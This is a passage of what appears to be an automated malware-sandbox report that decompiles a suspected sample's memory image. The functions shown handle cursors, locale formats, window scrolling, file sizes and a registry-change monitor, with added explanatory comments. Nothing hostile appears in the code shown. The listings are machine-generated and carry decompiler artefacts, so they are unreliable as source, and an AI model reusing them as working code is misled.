                                                    0x0045b680
                                                    0x0045b685
                                                    0x0045b692
                                                    0x0045b97f
                                                    0x0045b97f
                                                    0x0045b982
                                                    0x0045b984
                                                    0x0045b995
                                                    0x0045b986
                                                    0x0045b98c
                                                    0x0045b98c
                                                    0x00000000
                                                    0x0045b6cb
                                                    0x0045b6d0
                                                    0x0045b6d6
                                                    0x0045b6dc
                                                    0x0045b6e4
                                                    0x0045b6f1
                                                    0x0045b6f9
                                                    0x0045b704
                                                    0x0045b70f
                                                    0x0045b710
                                                    0x0045b711
                                                    0x0045b712
                                                    0x0045b71d
                                                    0x0045b722
                                                    0x0045b727
                                                    0x0045b72f
                                                    0x0045b732
                                                    0x0045b734
                                                    0x0045b744
                                                    0x0045b749
                                                    0x0045b74f
                                                    0x0045b754
                                                    0x0045b756
                                                    0x0045b758
                                                    0x0045b75f
                                                    0x0045b76c
                                                    0x0045b76c
                                                    0x0045b75f
                                                    0x0045b736
                                                    0x0045b73d
                                                    0x0045b73d
                                                    0x0045b783
                                                    0x0045b796
                                                    0x0045b7a1
                                                    0x0045b7aa
                                                    0x0045b7b8
                                                    0x0045b7c9
                                                    0x0045b7d7
                                                    0x0045b7de
                                                    0x0045b7e6
                                                    0x0045b7e9
                                                    0x0045b7ee
                                                    0x0045b7f3
                                                    0x0045b80d
                                                    0x0045b815
                                                    0x0045b835
                                                    0x0045b835
                                                    0x0045b83f
                                                    0x0045b849
                                                    0x0045b84d
                                                    0x0045b84d
                                                    0x0045b84d
                                                    0x0045b84f
                                                    0x0045b851
                                                    0x0045b85a
                                                    0x00000000
                                                    0x0045b860
                                                    0x0045b860
                                                    0x0045b864
                                                    0x00000000
                                                    0x00000000
                                                    0x0045b86e
                                                    0x0045b886
                                                    0x0045b8a1
                                                    0x0045b8b3
                                                    0x0045b8cb
                                                    0x0045b8d7
                                                    0x0045b8da
                                                    0x0045b8dd
                                                    0x0045b8dd
                                                    0x0045b8ee
                                                    0x0045b8f3
                                                    0x0045b8fb
                                                    0x0045b904
                                                    0x0045b915
                                                    0x0045b91a
                                                    0x0045b922
                                                    0x0045b92b
                                                    0x0045b939
                                                    0x0045b952
                                                    0x0045b958
                                                    0x0045b95d
                                                    0x0045b962
                                                    0x0045b978
                                                    0x0045b964
                                                    0x0045b96a
                                                    0x0045b96a
                                                    0x0045b99a
                                                    0x0045b99c
                                                    0x0045b99f
                                                    0x0045b9a2
                                                    0x0045b9b2
                                                    0x0045b9ba
                                                    0x0045b9c5
                                                    0x0045b9c5
                                                    0x0045b85a

                                                    APIs
                                                      • Part of subcall function 004517CC: GetActiveWindow.USER32 ref: 004517CF
                                                      • Part of subcall function 004517CC: GetCurrentThreadId.KERNEL32 ref: 004517E4
                                                      • Part of subcall function 004517CC: EnumThreadWindows.USER32(00000000,004517AC), ref: 004517EA
                                                      • Part of subcall function 0045B3E0: GetCursor.USER32(?), ref: 0045B3FB
                                                      • Part of subcall function 0045B3E0: GetIconInfo.USER32(00000000,?), ref: 0045B401
                                                    • ClientToScreen.USER32(?,?), ref: 0045B76C
                                                    • OffsetRect.USER32(?,?,?), ref: 0045B783
                                                    • OffsetRect.USER32(?,?,?), ref: 0045B8B3
                                                      • Part of subcall function 0045B1B0: SetTimer.USER32 ref: 0045B1CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows
                                                    • String ID: tC
                                                    • API String ID: 2591747986-1085749316
                                                    • Opcode ID: 3d652ba1a3436a72cfe8ea0ee2e08dc750de709dd5d5b2f6d499bfc4cb44fc42
                                                    • Instruction ID: 5094cc74829a0d0ddc56b95c8e280c0bc637037c8d8d66aa697b62fbdea552c2
                                                    • Opcode Fuzzy Hash: 3d652ba1a3436a72cfe8ea0ee2e08dc750de709dd5d5b2f6d499bfc4cb44fc42
                                                    • Instruction Fuzzy Hash: 1FC1D675A006188FCB10EF68C485A9EB7F5FF49304F1440AAE905EB366DB34AD49CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 82%
                                                    			E0040CC9C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr _v8;
                                                    				char _v12;
                                                    				intOrPtr _v16;
                                                    				char _v20;
                                                    				char _v24;
                                                    				void* _t41;
                                                    				signed int _t45;
                                                    				signed int _t47;
                                                    				signed int _t49;
                                                    				signed int _t51;
                                                    				intOrPtr _t75;
                                                    				void* _t76;
                                                    				signed int _t77;
                                                    				signed int _t83;
                                                    				signed int _t92;
                                                    				intOrPtr _t111;
                                                    				void* _t122;
                                                    				void* _t124;
                                                    				intOrPtr _t127;
                                                    				void* _t128;
                                                    
                                                    				_t128 = __eflags;
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_push(0);
                                                    				_t122 = __edx;
                                                    				_t124 = __eax;
                                                    				_push(_t127);
                                                    				_push(0x40ce66);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t127;
                                                    				_t92 = 1;
                                                    				E004049C0(__edx);
                                                    				E0040C964(GetThreadLocale(), 0x40ce7c, 0x1009,  &_v12);
                                                    				if(E00409664(0x40ce7c, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                    					while(1) {
                                                    						_t41 = E00404C80(_t124);
                                                    						__eflags = _t92 - _t41;
                                                    						if(_t92 > _t41) {
                                                    							goto L28;
                                                    						}
                                                    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                                    						asm("bt [0x49b134], eax");
                                                    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                                    							_t45 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40ce80);
                                                    							__eflags = _t45;
                                                    							if(_t45 != 0) {
                                                    								_t47 = E0040A0C8(_t124 + _t92 - 1, 4, 0x40ce90);
                                                    								__eflags = _t47;
                                                    								if(_t47 != 0) {
                                                    									_t49 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40cea8);
                                                    									__eflags = _t49;
                                                    									if(_t49 != 0) {
                                                    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                                    										__eflags = _t51;
                                                    										if(_t51 == 0) {
                                                    											L24:
                                                    											E00404C88(_t122, 0x40cec0);
                                                    										} else {
                                                    											__eflags = _t51 != 0x20;
                                                    											if(_t51 != 0x20) {
                                                    												E00404BA8();
                                                    												E00404C88(_t122, _v24);
                                                    											} else {
                                                    												goto L24;
                                                    											}
                                                    										}
                                                    									} else {
                                                    										E00404C88(_t122, 0x40ceb4);
                                                    										_t92 = _t92 + 1;
                                                    									}
                                                    								} else {
                                                    									E00404C88(_t122, 0x40cea0);
                                                    									_t92 = _t92 + 3;
                                                    								}
                                                    							} else {
                                                    								E00404C88(_t122, 0x40ce8c);
                                                    								_t92 = _t92 + 1;
                                                    							}
                                                    							_t92 = _t92 + 1;
                                                    							__eflags = _t92;
                                                    						} else {
                                                    							_v8 = L0040DD78(_t124, _t92);
                                                    							E00404EE0(_t124, _v8, _t92,  &_v20);
                                                    							E00404C88(_t122, _v20);
                                                    							_t92 = _t92 + _v8;
                                                    						}
                                                    					}
                                                    				} else {
                                                    					_t75 =  *0x49e748; // 0x9
                                                    					_t76 = _t75 - 4;
                                                    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                    						_t77 = 1;
                                                    					} else {
                                                    						_t77 = 0;
                                                    					}
                                                    					if(_t77 == 0) {
                                                    						E00404A14(_t122, _t124);
                                                    					} else {
                                                    						while(_t92 <= E00404C80(_t124)) {
                                                    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                                    							__eflags = _t83;
                                                    							if(_t83 != 0) {
                                                    								__eflags = _t83 != 0x20;
                                                    								if(_t83 != 0x20) {
                                                    									E00404BA8();
                                                    									E00404C88(_t122, _v16);
                                                    								}
                                                    							}
                                                    							_t92 = _t92 + 1;
                                                    							__eflags = _t92;
                                                    						}
                                                    					}
                                                    				}
                                                    				L28:
                                                    				_pop(_t111);
                                                    				 *[fs:eax] = _t111;
                                                    				_push(E0040CE6D);
                                                    				return E004049E4( &_v24, 4);
                                                    			}

                                                    APIs
                                                    • GetThreadLocale.KERNEL32(?,00000000,0040CE66,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CCCB
                                                      • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$InfoThread
                                                    • String ID: eeee$ggg$yyyy
                                                    • API String ID: 4232894706-1253427255
                                                    • Opcode ID: d28100b5305c21fd00ac2895344e80118dbb898973983dfd69c2917494964e80
                                                    • Instruction ID: 4a597fd56ac0f87983323c6834d704910f88c0d9acca8889b228a53315074fe8
                                                    • Opcode Fuzzy Hash: d28100b5305c21fd00ac2895344e80118dbb898973983dfd69c2917494964e80
                                                    • Instruction Fuzzy Hash: 0541E5B0314504CBE711AB7AC8C12BEB69ADF85304BA1463BE542B37C5D63CED0782AD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E004392CC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				struct tagPOINT _v20;
                                                    				intOrPtr _v24;
                                                    				char _v28;
                                                    				char _v36;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				intOrPtr _t54;
                                                    				intOrPtr _t60;
                                                    				intOrPtr _t65;
                                                    				intOrPtr _t71;
                                                    				intOrPtr _t74;
                                                    				void* _t88;
                                                    				intOrPtr _t105;
                                                    				intOrPtr _t115;
                                                    				intOrPtr _t116;
                                                    				intOrPtr _t120;
                                                    				intOrPtr _t123;
                                                    				intOrPtr _t124;
                                                    				intOrPtr _t129;
                                                    				void* _t133;
                                                    				intOrPtr _t134;
                                                    				void* _t137;
                                                    
                                                    				_t137 = __fp0;
                                                    				_v8 = __ecx;
                                                    				_t88 = __edx;
                                                    				_t124 = __eax;
                                                    				 *0x49eb34 = __eax;
                                                    				_push(_t133);
                                                    				_push(0x439471);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t134;
                                                    				_v12 = 0;
                                                    				 *0x49eb3c = 0;
                                                    				_t135 =  *((char*)(__eax + 0x9b));
                                                    				if( *((char*)(__eax + 0x9b)) != 0) {
                                                    					L00403DE8(__eax, __eflags);
                                                    					__eflags =  *0x49eb34;
                                                    					if( *0x49eb34 != 0) {
                                                    						__eflags = _v12;
                                                    						if(_v12 == 0) {
                                                    							_v12 = E00438690(1, _t124);
                                                    							 *0x49eb3c = 1;
                                                    						}
                                                    						_t128 =  *((intOrPtr*)(_v12 + 0x38));
                                                    						_t105 =  *0x437498; // 0x4374e4
                                                    						_t54 = L00403D78( *((intOrPtr*)(_v12 + 0x38)), _t105);
                                                    						__eflags = _t54;
                                                    						if(_t54 == 0) {
                                                    							_t129 =  *((intOrPtr*)(_v12 + 0x38));
                                                    							__eflags =  *((intOrPtr*)(_t129 + 0x30));
                                                    							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
                                                    								L14:
                                                    								__eflags = 0;
                                                    								E004197DC(0,  &_v36, 0, _t124, _t129);
                                                    								E0043AA94(_t129,  &_v28,  &_v36);
                                                    								_t60 = _v12;
                                                    								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
                                                    								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
                                                    								L15:
                                                    								_t130 = _v12;
                                                    								_t125 =  *((intOrPtr*)(_v12 + 0x38));
                                                    								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
                                                    								E004197DC( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)), _t125, _t130);
                                                    								_t65 = _v12;
                                                    								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
                                                    								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
                                                    								goto L16;
                                                    							}
                                                    							_t116 =  *0x437498; // 0x4374e4
                                                    							_t71 = L00403D78(_t129, _t116);
                                                    							__eflags = _t71;
                                                    							if(_t71 != 0) {
                                                    								goto L14;
                                                    							}
                                                    							GetCursorPos( &_v20);
                                                    							_t74 = _v12;
                                                    							 *(_t74 + 0x44) = _v20.x;
                                                    							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
                                                    							goto L15;
                                                    						} else {
                                                    							GetWindowRect(E00441704(_t128), _v12 + 0x44);
                                                    							L16:
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							asm("movsd");
                                                    							L17:
                                                    							E0043915C(_v12, _v8, _t88, _t133, _t137);
                                                    							_pop(_t115);
                                                    							 *[fs:eax] = _t115;
                                                    							return 0;
                                                    						}
                                                    					}
                                                    					_pop(_t120);
                                                    					 *[fs:eax] = _t120;
                                                    					return 0;
                                                    				}
                                                    				L00403DE8(__eax, _t135);
                                                    				if( *0x49eb34 != 0) {
                                                    					__eflags = _v12;
                                                    					if(_v12 == 0) {
                                                    						_v12 = E00438578(_t124, 1);
                                                    						 *0x49eb3c = 1;
                                                    					}
                                                    					goto L17;
                                                    				}
                                                    				_pop(_t123);
                                                    				 *[fs:eax] = _t123;
                                                    				return 0;
                                                    			}

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \`C$tC
                                                    • API String ID: 0-3452953066
                                                    • Opcode ID: 7f311c78a9e9a2a49b05a8a0dc50e5fb1a8e9d30b6fb2c2c62024502aead32bf
                                                    • Instruction ID: 1d99dae1233738e974a732b918af4f5548ca7b3dae0a6c744bb57b2c2fe5a1b7
                                                    • Opcode Fuzzy Hash: 7f311c78a9e9a2a49b05a8a0dc50e5fb1a8e9d30b6fb2c2c62024502aead32bf
                                                    • Instruction Fuzzy Hash: 0F519170A046059FCB00DF9AD481A9EBBF5FF9C314F10906BE805A7361D779AD81CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E0043915C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
                                                    				intOrPtr _v16;
                                                    				intOrPtr _t24;
                                                    				intOrPtr _t26;
                                                    				intOrPtr _t28;
                                                    				intOrPtr* _t32;
                                                    				intOrPtr _t35;
                                                    				intOrPtr _t37;
                                                    				struct HWND__* _t38;
                                                    				intOrPtr _t39;
                                                    				intOrPtr* _t41;
                                                    				intOrPtr _t45;
                                                    				intOrPtr _t49;
                                                    				intOrPtr* _t53;
                                                    				long _t58;
                                                    				intOrPtr _t59;
                                                    				intOrPtr _t60;
                                                    				intOrPtr* _t65;
                                                    				intOrPtr _t66;
                                                    				intOrPtr _t70;
                                                    				intOrPtr* _t77;
                                                    				void* _t79;
                                                    				intOrPtr* _t80;
                                                    				long long _t87;
                                                    
                                                    				_t87 = __fp0;
                                                    				_t80 = _t79 + 0xfffffff8;
                                                    				_t70 = __ecx;
                                                    				_t45 = __edx;
                                                    				_t77 = __eax;
                                                    				 *0x49eb38 = __eax;
                                                    				_t24 =  *0x49eb38; // 0x0
                                                    				 *((intOrPtr*)(_t24 + 4)) = 0;
                                                    				GetCursorPos(0x49eb44);
                                                    				_t26 =  *0x49eb38; // 0x0
                                                    				_t58 = 0x49eb44->x; // 0x0
                                                    				 *(_t26 + 0xc) = _t58;
                                                    				_t59 =  *0x49eb48; // 0x0
                                                    				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
                                                    				 *0x49eb4c = GetCursor();
                                                    				_t28 =  *0x49eb38; // 0x0
                                                    				 *0x49eb40 = E00438388(_t28);
                                                    				 *0x49eb50 = _t70;
                                                    				_t60 =  *0x4360a0; // 0x4360ec
                                                    				if(L00403D78(_t77, _t60) == 0) {
                                                    					__eflags = _t45;
                                                    					if(__eflags == 0) {
                                                    						 *0x49eb54 = 0;
                                                    					} else {
                                                    						 *0x49eb54 = 1;
                                                    					}
                                                    				} else {
                                                    					_t65 = _t77;
                                                    					_t4 = _t65 + 0x44; // 0x44
                                                    					_t41 = _t4;
                                                    					_t49 =  *_t41;
                                                    					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
                                                    						__eflags = 0;
                                                    						 *((intOrPtr*)(_t65 + 0x20)) = 0;
                                                    						 *((intOrPtr*)(_t65 + 0x24)) = 0;
                                                    					} else {
                                                    						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
                                                    						asm("fild dword [esp]");
                                                    						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
                                                    						asm("fild dword [esp+0x4]");
                                                    						asm("fdivp st1, st0");
                                                    						 *((long long*)(_t65 + 0x20)) = __fp0;
                                                    						asm("wait");
                                                    					}
                                                    					_t66 =  *((intOrPtr*)(_t41 + 4));
                                                    					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
                                                    						__eflags = 0;
                                                    						 *((intOrPtr*)(_t77 + 0x28)) = 0;
                                                    						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
                                                    					} else {
                                                    						_t53 = _t77;
                                                    						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
                                                    						asm("fild dword [esp]");
                                                    						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
                                                    						asm("fild dword [esp+0x4]");
                                                    						asm("fdivp st1, st0");
                                                    						 *((long long*)(_t53 + 0x28)) = _t87;
                                                    						asm("wait");
                                                    					}
                                                    					if(_t45 == 0) {
                                                    						 *0x49eb54 = 0;
                                                    					} else {
                                                    						 *0x49eb54 = 2;
                                                    						 *((intOrPtr*)( *_t77 + 0x30))();
                                                    					}
                                                    				}
                                                    				_t32 =  *0x49eb38; // 0x0
                                                    				 *0x49eb58 =  *((intOrPtr*)( *_t32 + 8))();
                                                    				_t85 =  *0x49eb58;
                                                    				if( *0x49eb58 != 0) {
                                                    					_t37 =  *0x49eb48; // 0x0
                                                    					_t38 = GetDesktopWindow();
                                                    					_t39 =  *0x49eb58; // 0x0
                                                    					E00443038(_t39, _t38, _t85, _t37);
                                                    				}
                                                    				_t35 = L00403BBC(1);
                                                    				 *0x49eb60 = _t35;
                                                    				if( *0x49eb54 != 0) {
                                                    					_t35 = E00438E8C(0x49eb44, 1);
                                                    				}
                                                    				return _t35;
                                                     			}

                                                    Instruction addresses for the listing above, in listing order (0x00000000 marks a synthetic line such as a goto): 0x0043915c, 0x0043915f, 0x00439162, 0x00439164, 0x00439166, 0x00439168, 0x0043916e, 0x00439175, 0x0043917d, 0x00439182, 0x00439187, 0x0043918d, 0x00439190, 0x00439196, 0x0043919e, 0x004391a3, 0x004391ad, 0x004391b2, 0x004391ba, 0x004391c7, 0x00439259, 0x0043925b, 0x00439266, 0x0043925d, 0x0043925d, 0x0043925d, 0x004391cd, 0x004391cd, 0x004391cf, 0x004391cf, 0x004391d5, 0x004391db, 0x004391fd, 0x004391ff, 0x00439202, 0x004391dd, 0x004391e2, 0x004391e5, 0x004391ed, 0x004391f1, 0x004391f5, 0x004391f7, 0x004391fa, 0x004391fa, 0x00439208, 0x0043920f, 0x00439234, 0x00439236, 0x00439239, 0x00439211, 0x00439211, 0x00439218, 0x0043921b, 0x00439224, 0x00439228, 0x0043922c, 0x0043922e, 0x00439231, 0x00439231, 0x0043923e, 0x00439250, 0x00439240, 0x00439240, 0x0043924b, 0x0043924b, 0x0043923e, 0x0043926d, 0x00439277, 0x0043927c, 0x00439283, 0x00439285, 0x0043928b, 0x00439298, 0x0043929d, 0x0043929d, 0x004392a9, 0x004392ae, 0x004392ba, 0x004392c1, 0x004392c1, 0x004392cb

                                                    APIs
                                                    • GetCursorPos.USER32(0049EB44), ref: 0043917D
                                                    • GetCursor.USER32(0049EB44), ref: 00439199
                                                      • Part of subcall function 00438388: SetCapture.USER32(00000000,?,004391AD,0049EB44), ref: 00438397
                                                    • GetDesktopWindow.USER32 ref: 0043928B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Cursor$CaptureDesktopWindow
                                                    • String ID: `C
                                                    • API String ID: 669539147-1847193361
                                                    • Opcode ID: 98fd7e759f67c62797e9628fe46d91982c6997d9d0034bbc864d442d377a4d8e
                                                    • Instruction ID: c6ff30aa0831a605475be7d7daa41799f87f77b36a22a6f0c8b6adc85e5341f0
                                                    • Opcode Fuzzy Hash: 98fd7e759f67c62797e9628fe46d91982c6997d9d0034bbc864d442d377a4d8e
                                                    • Instruction Fuzzy Hash: D441BE716096009FD304DF2ED948616BBE1FB88310F1989BFE44A8B3A1DB75EC41CB4A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                     			// Editor's note, not part of the sandbox output. Scrolls the window's client area
                                                     			// (ScrollWindow, only when the handle exists and the window is visible) and then
                                                     			// walks the child list (E0043E434 = count, E0043E3F8 = item): children without a
                                                     			// window handle get their stored x/y (+0x40/+0x44) shifted by the (__edx, __ecx)
                                                     			// delta; windowed children are moved with SetWindowPos. The undeclared _t34 in that
                                                     			// call is a decompiler artefact and refers to the same child as _t43. The flags
                                                     			// value 0x14 is SWP_NOZORDER (0x4) | SWP_NOACTIVATE (0x10). The "String ID" tC
                                                     			// below is the printable middle bytes (74 43) of the pointer 0x00437498, not a
                                                     			// string. Again ordinary GUI code from the decompiled process image.
                                                     			E004412BC(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
                                                    				char _t23;
                                                    				struct HWND__* _t42;
                                                    				void* _t43;
                                                    				intOrPtr _t47;
                                                    				void* _t54;
                                                    				void* _t56;
                                                    				void* _t57;
                                                    				void* _t58;
                                                    				intOrPtr* _t59;
                                                    
                                                    				 *((intOrPtr*)(_t59 + 4)) = __ecx;
                                                    				 *_t59 = __edx;
                                                    				_t54 = __eax;
                                                    				_t42 =  *(__eax + 0x180);
                                                    				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
                                                    					_t23 = 0;
                                                    				} else {
                                                    					_t23 = 1;
                                                    				}
                                                    				 *((char*)(_t59 + 8)) = _t23;
                                                    				if( *((char*)(_t59 + 8)) != 0) {
                                                    					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
                                                    				}
                                                    				_t56 = E0043E434(_t54) - 1;
                                                    				if(_t56 < 0) {
                                                    					L14:
                                                    					return E0043DFC4();
                                                    				} else {
                                                    					_t57 = _t56 + 1;
                                                    					_t58 = 0;
                                                    					do {
                                                    						_t43 = E0043E3F8(_t54, _t58);
                                                    						_t47 =  *0x437498; // 0x4374e4
                                                    						if(L00403D78(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
                                                    							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
                                                    							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
                                                    						} else {
                                                    							if( *((char*)(_t59 + 8)) == 0) {
                                                    								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
                                                    							}
                                                    						}
                                                    						_t58 = _t58 + 1;
                                                    						_t57 = _t57 - 1;
                                                    					} while (_t57 != 0);
                                                    					goto L14;
                                                    				}
                                                     			}

                                                    Instruction addresses for the listing above, in listing order (0x00000000 marks a synthetic line such as a goto): 0x004412c3, 0x004412c7, 0x004412ca, 0x004412cc, 0x004412d4, 0x004412e0, 0x004412e4, 0x004412e4, 0x004412e4, 0x004412e6, 0x004412ef, 0x00441306, 0x00441306, 0x00441314, 0x00441317, 0x00441385, 0x00441393, 0x00441319, 0x00441319, 0x0044131a, 0x0044131c, 0x00441325, 0x00441329, 0x00441336, 0x00441344, 0x0044134b, 0x00441350, 0x00441355, 0x0044137c, 0x0044137c, 0x00441355, 0x00441381, 0x00441382, 0x00441382, 0x00000000, 0x0044131c

                                                    APIs
                                                    • IsWindowVisible.USER32 ref: 004412D7
                                                    • ScrollWindow.USER32 ref: 00441306
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044137C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$ScrollVisible
                                                    • String ID: tC
                                                    • API String ID: 4127837035-1085749316
                                                    • Opcode ID: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                    • Instruction ID: d3335ac6ad808ac153b7fdabc62b5b7bad948aac8996c4e76790ef358f9a02f4
                                                    • Opcode Fuzzy Hash: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                    • Instruction Fuzzy Hash: AA219F71704700AFE710DF6AC880B6B77D4AF88754F14856EFA48CB262D738EC45875A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00000000,0047D0D2), ref: 0047D05E
                                                    • GetFileSize.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000), ref: 0047D096
                                                    • CloseHandle.KERNEL32(?,0047D0BC,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 0047D0AF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleSize
                                                    • String ID: lI
                                                    • API String ID: 1378416451-2224401619
                                                    • Opcode ID: 65a7822fe3a389ac1c9a09b887512d4a6e3414963bc98b9a02b16acb343bd438
                                                    • Instruction ID: 286afb8c99021898e2bdb5b6e8095afefc1f981a6a11c4acb5445e704e613de7
                                                    • Opcode Fuzzy Hash: 65a7822fe3a389ac1c9a09b887512d4a6e3414963bc98b9a02b16acb343bd438
                                                    • Instruction Fuzzy Hash: D6117970A04204BFEB11DBA9CC52F5AB7B8EB09704F5184B6FA14E76D0DA79AD108A18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                     			// Editor's note, not part of the sandbox output. Registry-change monitor setup.
                                                     			// Two manual-reset events (bManualReset = 0xffffffff, i.e. TRUE; initially
                                                     			// non-signalled) are stored at +0x50 and +0x4c. RegNotifyChangeKeyValue then gets
                                                     			// the key handle from an object field ([[this+0x40]+4]), bWatchSubtree from +0x44
                                                     			// (the cmc / sbb eax,eax pair is the usual Boolean-to-BOOL 0/-1 conversion), the
                                                     			// filter 5 = REG_NOTIFY_CHANGE_NAME (0x1) | REG_NOTIFY_CHANGE_LAST_SET (0x4), the
                                                     			// event at +0x50, and fAsynchronous = TRUE, so the call returns immediately and the
                                                     			// event is signalled on the next subkey or value change under that key. A non-zero
                                                     			// status is routed to E0040D144 with "Can not start monitoring", i.e. an error path.
                                                     			// Which key is watched cannot be recovered from this listing; it is set by whoever
                                                     			// fills +0x40 (the APIs entry shows 004945DD on the stack, most likely the return
                                                     			// address into that caller), so that is the function to inspect next.
                                                     			E00494694(void* __eax) {
                                                    				long _t18;
                                                    				void* _t20;
                                                    				void* _t21;
                                                    
                                                    				_t21 = __eax;
                                                    				 *((intOrPtr*)(__eax + 0x48)) = 5;
                                                    				 *(_t21 + 0x50) = CreateEventA(0, 0xffffffff, 0, 0);
                                                    				 *((intOrPtr*)(_t21 + 0x4c)) = CreateEventA(0, 0xffffffff, 0, 0);
                                                    				asm("cmc");
                                                    				asm("sbb eax, eax");
